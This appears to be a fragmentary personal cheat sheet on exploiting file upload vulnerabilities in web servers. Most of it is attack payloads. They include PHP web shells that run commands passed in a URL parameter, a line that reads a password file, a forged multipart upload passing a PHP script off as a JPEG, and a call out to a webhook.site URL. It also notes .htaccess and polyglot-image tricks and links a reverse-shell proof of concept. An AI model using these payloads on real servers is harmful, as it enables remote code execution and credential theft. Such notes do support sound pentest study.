File Upload

File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like ; - Name - Content - Size - Type

Leak in Content-Type response

The Content-Type response header may provide clues about what kind of file the server believes it has served. If this header hasn’t been explicitly set by the application code, it typically reflects the result of the file extension–MIME type mapping

Basic php

<?php echo file_get_contents('/home/user/whatever'); ?>

<?php echo system($_GET['command']); ?>

==> GET /example/exploit.php?command=whoami HTTP/1.1

<?php echo file_get_contents("https://webhook.site/5c9c4652-1d78-490f-aede-cb4820ab229f"); ?>

Content-Type multipart/form-data

------geckoformboundaryb1c53164ae34b296ed4c82a1c3d3e0d2
Content-Disposition: form-data; name="avatar"; filename="discord.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/user/password'); ?>

Path traversal in form

Sever doesn't execute php

Servers don’t execute PHP files by default. There are multiple ways to enable the execution of PHP files depending on the server technology. For example, in an Apache server, to run PHP in every directory, you need to add the following line to /etc/apache2/apache2.conf

The server can also be configured to apply specific rules to individual folders. This is done in the .htaccess file with those lines :

Example of a manipulated form where I add a htaccess file to run exploit.php5

Example of directory-specific configuration in a IIS server, located in web.config

Obfuscating

Intrinsic properties of files

JPG :

• Files always begin with bytes FF D8 FF

Polyglot files

We can create polyglot files with tools like exiftool that can allow us to hide malicious code in a different file type than the code.

For example, malicious php code in a .jpg

(nice poc: https://poeticalhacking.net/blog/posts/turning-a-jpg-into-a-reverse-shell-with-exiftool/)